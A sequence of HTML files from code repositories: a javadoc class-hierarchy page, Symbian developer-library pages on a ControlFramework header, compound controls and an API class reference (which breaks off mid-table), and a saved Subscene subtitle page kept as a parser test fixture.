<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_20) on Thu Nov 20 20:24:27 GMT 2014 --> <title>Class Hierarchy</title> <meta name="date" content="2014-11-20"> <link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style"> <script type="text/javascript" src="script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Class Hierarchy"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="deprecated-list.html">Deprecated</a></li> <li><a href="index-files/index-1.html">Index</a></li> <li><a href="help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="index.html?overview-tree.html" target="_top">Frames</a></li> <li><a href="overview-tree.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 class="title">Hierarchy For All Packages</h1> </div> <div class="contentContainer"> <h2 title="Class Hierarchy">Class Hierarchy</h2> <ul> <li type="circle">java.lang.Object <ul> <li type="circle"><a href="Player.html" title="class in &lt;Unnamed&gt;"><span class="typeNameLink">Player</span></a></li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="deprecated-list.html">Deprecated</a></li> <li><a href="index-files/index-1.html">Index</a></li> <li><a href="help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="index.html?overview-tree.html" target="_top">Frames</a></li> <li><a href="overview-tree.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
sdk/guid-6013a680-57f9-415b-8851-c4fa63356636/_control_framework_8hrh_source.html
warlordh/fork_Symbian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>TB9.2 Example Applications: examples/AppFramework/UIControls/ControlFramework/inc/ControlFramework.hrh Source File</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> <link type="text/css" rel="stylesheet" href="../css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="../css/sdl.css" media="screen"/> <!--[if IE]> <link href="../css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> </head> <body class="kernelguide"> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Product Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <!-- Generated by Doxygen 1.6.2 --> <h1>examples/AppFramework/UIControls/ControlFramework/inc/ControlFramework.hrh</h1><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">// Copyright (c) 2006-2009 Nokia Corporation and/or its subsidiary(-ies).</span> <a name="l00002"></a>00002 <span class="comment">// All rights reserved.</span> <a name="l00003"></a>00003 <span class="comment">// This component and the accompanying materials are made available</span> <a name="l00004"></a>00004 <span class="comment">// under the terms of &quot;Eclipse Public License v1.0&quot;</span> <a name="l00005"></a>00005 <span class="comment">// which accompanies this distribution, and is available</span> <a name="l00006"></a>00006 <span class="comment">// at the URL &quot;http://www.eclipse.org/legal/epl-v10.html&quot;.</span> <a name="l00007"></a>00007 <span class="comment">//</span> <a name="l00008"></a>00008 <span class="comment">// Initial Contributors:</span> <a name="l00009"></a>00009 <span class="comment">// Nokia Corporation - initial contribution.</span> <a name="l00010"></a>00010 <span class="comment">//</span> <a name="l00011"></a>00011 <span class="comment">// Contributors:</span> <a name="l00012"></a>00012 <span class="comment">//</span> <a name="l00013"></a>00013 <span class="comment">// Description:</span> <a name="l00014"></a>00014 <span class="comment">//</span> <a name="l00015"></a>00015 <a name="l00016"></a>00016 <span class="preprocessor">#define ECmdToggleBoldFont 20</span> <a name="l00017"></a>00017 <span class="preprocessor"></span><span class="preprocessor">#define ECmdToggleItalicFont 21</span> <a name="l00018"></a>00018 <span class="preprocessor"></span><span class="preprocessor">#define ECmdToggleUnderline 22</span> <a name="l00019"></a>00019 <span class="preprocessor"></span><span class="preprocessor">#define ECmdToggleStrikethrough 23</span> <a name="l00020"></a>00020 <span class="preprocessor"></span> <a name="l00021"></a>00021 </pre></div> <hr size="1"/><address style="text-align: right;"><small>Generated by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.2 </small></address> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
pdk/GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="concept"/> <meta name="DC.Title" content="Compound controls in the view architecture"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A"/> <meta name="DC.Language" content="en"/> <link rel="stylesheet" type="text/css" href="commonltr.css"/> <title>Compound controls in the view architecture</title> <?php include_once ($_SERVER["DOCUMENT_ROOT"]. '/includes/skin_constants.php'); include_once (CURRENT_SKIN_PATH.'/sdl_head.html'); ?> <link rel="stylesheet" type="text/css" href="nokiacxxref.css"/></head> <body id="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A"><a name="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"/> <h1 class="topictitle1">Compound controls in the view architecture</h1> <div> <p><a href="Chunk355813341.html">Compound controls</a> are controls that contain other controls. To create a compound control, you must do the following:</p> <ul> <li><p>construct the control in the parent control (that owns the window in which the child control appears). An example of an implementation is as follows:</p> <pre class="codeblock" id="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A__GUID-87D5DA2C-DF12-40CA-8F39-CA9B61500F8F"><a name="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A__GUID-87D5DA2C-DF12-40CA-8F39-CA9B61500F8F"><!-- --></a>void CMyViewContainer::ConstructL(const TRect&amp; aRect) { CreateWindowL(); iLabel = new (ELeave) CEikLabel; iLabel-&gt;SetContainerWindowL( *this ); iLabel-&gt;SetTextL( _L("MyView 1\n\nSelect local view\nswitching from menu") ); SetRect(aRect); ActivateL(); }</pre> <p>, where</p> <p><span class="parmname">iLabel = new (ELeave) CEikLabel;</span> creates a <a href="GUID-086B6DC9-E348-39C8-A9CB-686383CEA6EF.html"><span class="apiname">CEikLabel</span></a> class that supports the display of text in the parent window.</p> <p><a href="GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160.html#GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160__GUID-A39BAD7E-BAF2-3A4B-BE4F-2A86718EB190"><span class="apiname">CCoeControl::SetContainerWindowL()</span></a> assigns the non-window-owning control to the window-owning control.</p> <p><a href="GUID-086B6DC9-E348-39C8-A9CB-686383CEA6EF.html#GUID-086B6DC9-E348-39C8-A9CB-686383CEA6EF__GUID-879C7EC4-EDE0-3E2E-A827-CEAFB84154F7"><span class="apiname">CEikLabel::SetTextL()</span></a> sets a text for the label.</p> <p>The other methods are the standard methods for creating a window for the window-owning control.</p> </li> <li><p>add a method to the owning control that returns the number of controls in the compound control. An example of an implementation is as follows:</p> <pre class="codeblock" id="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A__GUID-048B5DCE-124A-4530-89AD-842DCA2F3FFC"><a name="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A__GUID-048B5DCE-124A-4530-89AD-842DCA2F3FFC"><!-- --></a>TInt CMyViewAppContainer::CountComponentControls() const { return KNumberOfControls; // return nbr of controls inside this compound control }</pre> <p>, where</p> <p><span class="parmname">CMyViewAppContainer::CountComponentControls()</span> overrides <a href="GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160.html#GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160__GUID-6F8D41E5-9B2C-3CEB-9F2F-9E2567D5BE39"><span class="apiname">CCoeControl::CountComponentControls()</span></a> to return the number of controls in the compound control.</p> <p><span class="parmname">KNumberOfControls</span> is a <span class="parmname">TInt</span> constant for the number of controls in the application. Other approaches could be used.</p> </li> <li><p>Add a method to the owning control that returns each of the controls by a zero-based index. An example of an implementation is as follows:</p> <pre class="codeblock" id="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A__GUID-3A8A5312-117E-466F-A5BC-6B7AF0A75B9C"><a name="GUID-57CA8A13-05C6-4AFE-9804-E2EA2453143A__GUID-3A8A5312-117E-466F-A5BC-6B7AF0A75B9C"><!-- --></a>CCoeControl* CContainerContainer::ComponentControl( TInt aIndex) const { switch ( aIndex ) { case 0: return iLabel; // return a pointer to the //iLabel default: return NULL; } } </pre> <p>, where</p> <p><span class="parmname">CCoeControl* CContainerContainer::ComponentControl(TInt aIndex)</span> gets an indexed component of a compound control. There are 2 ways to implement a compound control:</p> <ul> <li><p>override the function.</p> </li> </ul> <ul> <li><p>use the <a href="GUID-2D8BFBA2-79AC-364D-875D-E863CD4A2FE1.html"><span class="apiname">CCoeControlArray</span></a> functionality (see the <a href="GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160.html#GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160__GUID-40A8481A-F12C-3A5A-B84A-710301940585"><span class="apiname">CCoeControl::InitComponentArrayL()</span></a> method). </p> </li> </ul> <div class="note"><span class="notetitle">Note:</span> <p> Within a compound control, each component control is identified by an index, where the index depends on the order the controls were added: the first is given an index of <span class="parmname">0</span>, the next an index of <span class="parmname">1</span>, and so on. </p> </div> <p>All child controls should be accessible by <a href="GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160.html#GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160__GUID-B727C7DA-6DEF-339D-A31E-A292BD800A3B"><span class="apiname">CCoeControl::ComponentControl()</span></a> at any time, regardless of whether they are visible or not. The visibility of a control should be adjusted using the <a href="GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160.html#GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160__GUID-159A51CE-4AEF-367B-9182-F33489D08BE2"><span class="apiname">CCoeControl::MakeVisible()</span></a> method.</p> </li> </ul> <p><span class="parmname">CCoeControl* CContainerContainer::ComponentControl(TInt aIndex)</span> and <a href="GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160.html#GUID-B06F99BD-F032-3B87-AB26-5DD6EBE8C160__GUID-6F8D41E5-9B2C-3CEB-9F2F-9E2567D5BE39"><span class="apiname">CCoeControl::CountComponentControls()</span></a> work in conjunction with each other. The Symbian platform can query the control as to how many components it has and then request a pointer to each of the component's controls. Controls can be added or removed at run time using these two methods. The framework uses this information to draw the container. </p> <p>The compound control usually owns the child controls and therefore it is responsible of their construction and destruction. The compound control should also set the positions and sizes of its child controls; it must ensure that all child controls are inside the compound control rectangle and visible child rectangles do not overlap each other.</p> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
resources/fixtures/subscene_page.html
submanio/subman-parser
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>Subscene - The Following - Second Season English hearing impaired subtitle</title> <!--[if lt IE 9]> <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="Subscene" /> <link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link href="/css?v=5E7P7flzenviEJ_vD61emio-xkVRTRX5io3gWfYSaQ81" rel="stylesheet"/> <script src="/js?v=YWVP00jp9jyS1usDVUjyDrwhkzRSk7XhPqOiqGDyjg01" async type="text/javascript"></script> </head> <body> <header> <nav id="forum-navigation"> <ul> <li> <a href="http://v2.subscene.com/forums/default.aspx">Forums</a> </li> <li> <a href="http://v2.subscene.com/">Old Version 2</a> </li> </ul> </nav> <nav id="user-navigation"> <ul> <li> <a href="http://v2.subscene.com/login.aspx?ReturnUrl=http://subscene.com/subtitles/the-following-second-season/english/865021">Login</a> </li> <li> <a href="http://v2.subscene.com/user/CreateUser.aspx">Register</a> </li> </ul> </nav> <div id="logo"> <a href="/"><em>Subscene 3.0 </em></a> </div> <div id="search"> <div class="filter"> <ul> (All Languages) <li> <a href="/filter?returnUrl=%2fsubtitles%2fthe-following-second-season%2fenglish%2f865021" title="Edit subtitle filter">Edit</a> </li> </ul> </div> <form action="/subtitles/title"> <input type="text" name="q" id="q" class="text" /> <input type="hidden" name="l" id="l" class="text" value="" /> <button type="submit">Subtitle Search</button> </form> </div> <nav class="main"> <ul> <li> <a href="http://subscene.com/browse" class="" >Browse</a> </li> <li> <a href="http://u.subscene.com/the-following-second-season" >Upload</a> </li> </ul> </nav> </header> <div id="content" class="clearfix"> <script type="text/javascript"> var model = null; var downloadButtonText = ""; function DownloadSubtitle(downloadLink) { var downloading = document.getElementById('downloading'); downloading.style.display = ''; if (downloadButtonText == "") downloadButtonText = downloadLink.innerHTML; downloadLink.innerHTML = downloadButtonText + "..."; if(model != null) model.Show("True"); }; function CloseDownloading() { var downloading = document.getElementById('downloading'); var downloadButton = document.getElementById('downloadButton'); if (downloading.style.display == '') { downloading.style.display = 'none'; downloadButton.innerHTML = downloadButtonText; } }; function TogglePreview() { var show = Toggle('preview'); CloseDownloading(); if (show != undefined) Set_Cookie("ShowSubtitlePreview", show ? "false" : "true"); }; function ToggleDetails() { var show = Toggle('details'); CloseDownloading(); if (show != undefined) Set_Cookie("ShowSubtitleDetails", show ? "false" : "true"); }; function Toggle(name) { var el = document.getElementById(name); if (el.style.display == '') el.style.display = 'none'; else el.style.display = ''; return el.style.display; }; function SubtitleViewModel() { this.ratingService = new ratingService("u.subscene.com"); var self = this; self.SubtitleId = 865021; self.Rating = ko.observable(); self.RatingCssName = ko.observable(null); // Not used on index page. Do not delete. self.UserRating = ko.observable(); self.UserRatingDisplay = ko.observable(''); self.Show = ko.observable('False'); self.Rate = function (rating) { this.ratingService.AddRating(self, rating); }; self.Undo = function () { this.ratingService.UndoRating(self); }; self.ErrorMessage = ko.observable(null); }; </script> <div class="subtitle" itemscope itemtype="http://schema.org/Movie/Subtitle"> <div class="bread"> <a href="/subtitles/the-following-second-season" title="English The Following - Second Season subtitles">&laquo; back to subtitle list </a> </div> <div class="box clearfix"> <div class="top right"> <div class="banner"> <div class="size250"> <script async src="http://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Subscene - 250 --> <ins class="adsbygoogle" style="display: inline-block; width: 300px; height: 250px" data-ad-client="ca-pub-7543900465589397" data-ad-slot="6229657942"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> </div> <div class="top left"> <div class="poster"> <a href="http://i.jeded.com/i/the-following-second-season.17150.jpg" target="_blank"> <img src="http://i.jeded.com/i/the-following-second-season.154-17150.jpg" alt="Poster" /> </a> </div> <li class="header"> <h1> <span itemprop="name"> The Following - Second Season </span> <a target="_blank" class="imdb" href="http://www.imdb.com/title/tt2071645">Imdb</a> </h1> <ul> <li class="release"> <strong>Release info: </strong> <div> The.Following.S02E05.720p.HDTV.X264-DIMENSION </div> <div> The.Following.S02E05.480p.HDTV.x264-Micromkv </div> <div> The.Following.S02E05.480p.HDTV.x264-mSD </div> <div> The.Following.S02E05.HDTV.x264-LOL </div> <div> The.Following.S02E05.HDTV.XviD-FUM </div> <div> The.Following.S02E05.HDTV.XviD-AFG </div> <div> The.Following.S02E05.HDTV.x264-GWC </div> </li> <li class="author"> <a href="/u/659433"> Ivandrofly <span class="rating-bar" title="Combined subtitle rating: 9"> <span class="good"></span> <span class="good"></span> <span class="good"></span> <span class="good"></span> <span class="good"></span> <span class="good"></span> <span class="good"></span> <span class="good"></span> <span class="good"></span> <span class="neutral"></span> </span> </a> </li> <li class="comment-wrapper"> <div class="comment"> COLORED HI. Fixed: Unneeded spaces, Bridge small gaps in duration, Lines balanced, HTML tags, Names, OCR, Overlapping, Short display-time, Missing quote(&quot;), Missing period at end of lines. etc... </div> <nav class="comment-sub"> <ul> <li> <a href="javascript:ToggleDetails();" rel="nofollow">Subtitle details </a> </li> <li> <a href="javascript:TogglePreview();" rel="nofollow">Preview</a> </li> <li> <a href="http://v2.subscene.com/forums/AddPost.aspx?ForumID=3&amp;subtitleId=865021">Add comment</a> </li> <li> <a href="javascript:Embed('flagSubtitleContainer','subscene.com/flag/0/865021');" rel="nofollow">Flag</a> </li> </ul> </nav> </li> <li class="clearfix"> <a href="/subtitles/the-following-second-season/english/865021/ratings"> <div class="rating-head"> Rated </div> <div class="rating neutral hint hint--left" data-hint="By 0 users"> -- </div></a> <div class="download"> <a href="/subtitle/download?mac=ikZXBjGYgmyy4BOymnZ6mFbLF_YeiqKwsB62_ws6DQGSI_xttB_x5LpWFRUVivJ10" rel="nofollow" onclick="DownloadSubtitle(this)" id="downloadButton" class="button neutral">Download English Subtitle <span class="hearing-impaired" title="Hearing Impaired"></span> </a> </div> </li> </ul> </div> </div> </div> <div class="clearfix"> <div class="flagContainer" id="flagSubtitleContainer_Loading" style="display:none;"> <div class="window"> <h3> Loading... </h3> </div> </div> <iframe class="flagContainer" id="flagSubtitleContainer" style="display:none;"></iframe> <div class="window" style='display: none' id='downloading'> <div class="close"> <a href="javascript:CloseDownloading();" rel="nofollow"></a> </div> <h3> Subtitle downloading...</h3> </div> <div class="details"> <div class="window" style='display:none;' id='preview'> <div class="close"> <a href="javascript:TogglePreview();" rel="nofollow"></a> </div> <h3>Subtitle preview:</h3> <p> 1<br />00:00:00,618 --&gt; 00:00:01,658<br />&lt;font color=&quot;#804040&quot;&gt;MAN ON TV:&lt;/font&gt; Killer twins...<br /><br />2<br />00:00:01,683 --&gt; 00:00:02,963<br />that&#39;s the breaking<br />news today...<br /><br />3<br />00:00:02,994 --&gt; 00:00:04,106<br />You guys have been made.<br /><br />4<br />00:00:04,193 --&gt; 00:00:05,193<br />&lt;font color=&quot;#804040&quot;&gt;MARK:&lt;/font&gt; It was inevitable.<br /><br />5<br />00:00:05,235 --&gt; 00:00:06,583<br /> </p> </div> <div class="window" style='display:none;' id='details'> <div class="close"> <a href="javascript:ToggleDetails();" rel="nofollow"></a> </div> <h3>Subtitle details:</h3> <ul> <li> <strong>Online:</strong> 2/18/2014 7:56 PM <strong> &nbsp; 49 minutes ago </strong> </li> <li> <strong>Hearing Impaired:</strong> Yes </li> <li> <strong>Foreign parts:</strong> Yes </li> <li> <strong>Framerate:</strong> 23.976 </li> <li> <strong>Files:</strong> 1 (16,777 bytes) </li> <li> <strong>Production type:</strong> Improved a subtitle </li> <li> <strong>Release type:</strong> TV </li> <li> --------------------------------------- </li> <li> <strong>Not rated</strong> </li> <li> <strong>Downloads:</strong> 47 </li> </ul> </div> </div> <div style="margin-top:20px"> <div class="banner"> <div class="size728"> <script async src="http://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Subscene - 728 Above --> <ins class="adsbygoogle" style="display: inline-block; width: 728px; height: 90px" data-ad-client="ca-pub-7543900465589397" data-ad-slot="7985592746"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> </div> </div> <div class="bottom"> </div> </div> <footer> <div class="right align-right"> <p> Design by <a href="http://imyourfriend.dk/">Im Your Friend</a>. </p> </div> <div class="right"> </div> <div> <div class="copyright"> &copy; 2014 Subscene <span class="version">(Version 3.6.1)</span> </div> <nav> <ul> <li> <div class="twitter"> <a href="https://twitter.com/subscene_com" class="twitter-follow-button">@subscene_com</a> </div> </li> <li> <a href="http://v2.subscene.com/base/sponsor.aspx">Support Subscene</a> </li> <li> <a href="/site/legal-information">Legal Information</a> </li> <li> <a href="/site/contact">Contact Us</a> </li> </ul> </nav> </div> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-340707-2']); _gaq.push(['_trackPageview']); (function () { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <script type="text/javascript"> if (top.location != location) { top.location.href = document.location.href; } </script> </footer> </body> </html>
sdk/GUID-939AC0E8-ABDE-37FA-BFC3-54EE83DC6F6D.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="Swi::RSisRevocationEntry" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-939AC0E8-ABDE-37FA-BFC3-54EE83DC6F6D" /> <title> Swi::RSisRevocationEntry </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-939AC0E8-ABDE-37FA-BFC3-54EE83DC6F6D"> <a name="GUID-939AC0E8-ABDE-37FA-BFC3-54EE83DC6F6D"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2420140 id2420354 id2420671 id2420676 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> Swi::RSisRevocationEntry Class Reference </h1> <table class="signature"> <tr> <td> class Swi::RSisRevocationEntry : public Swi::RSisRegistryWritableEntry </td> </tr> </table> <div class="section"> </div> <div class="section derivation"> <h2 class="sectiontitle"> Inherits from </h2> <ul class="derivation derivation-root"> <li class="derivation-depth-0 "> Swi::RSisRevocationEntry <ul class="derivation"> <li class="derivation-depth-1 "> <a href="GUID-C7180AE5-C8A8-3135-8C2C-78DF739EE8BE.html"> Swi::RSisRegistryWritableEntry </a> <ul class="derivation"> <li class="derivation-depth-2 "> <a href="GUID-35B7C93E-50F3-306B-95D9-07D71F0B8B27.html"> Swi::RSisRegistryEntry </a> <ul class="derivation"> <li class="derivation-depth-3 "> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase </a> </li> </ul> </li> </ul> </li> </ul> </li> </ul> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-2B2FE7A5-6C44-34CA-A8D8-20D147A740B3"> CancelRevocationStatusL </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-6D2256E1-E710-363C-8A79-0A3859A70600"> CheckRevocationStatus </a> (const <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html"> TDesC8 </a> &amp;, <a href="GUID-E0B34F3E-D4C4-3232-B8B1-7DB35B454646.html"> TRequestStatus </a> &amp;) </td> </tr> <tr> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-750B086B-7C5C-31AD-A914-FCA1F8097DBD"> CheckRevocationStatusL </a> (const <a href="GUID-FB97E0A3-352A-316F-97C6-69E4741A8120.html"> TDesC8 </a> &amp;) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Functions </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::CloseSubSession(TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::CreateAutoCloseSubSession(RSessionBase &amp;,TInt,const TIpcArgs &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::CreateSubSession(const RSessionBase &amp;,TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::CreateSubSession(const RSessionBase &amp;,TInt,const TIpcArgs &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::RSubSessionBase() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::Send(TInt)const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::Send(TInt,const TIpcArgs &amp;)const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::SendReceive(TInt)const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::SendReceive(TInt,TRequestStatus &amp;)const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-1BBE1448-1DF8-33C4-BF9E-5A5F427AEE35.html"> RSubSessionBase::SendReceive(TInt,const TIpcArgs 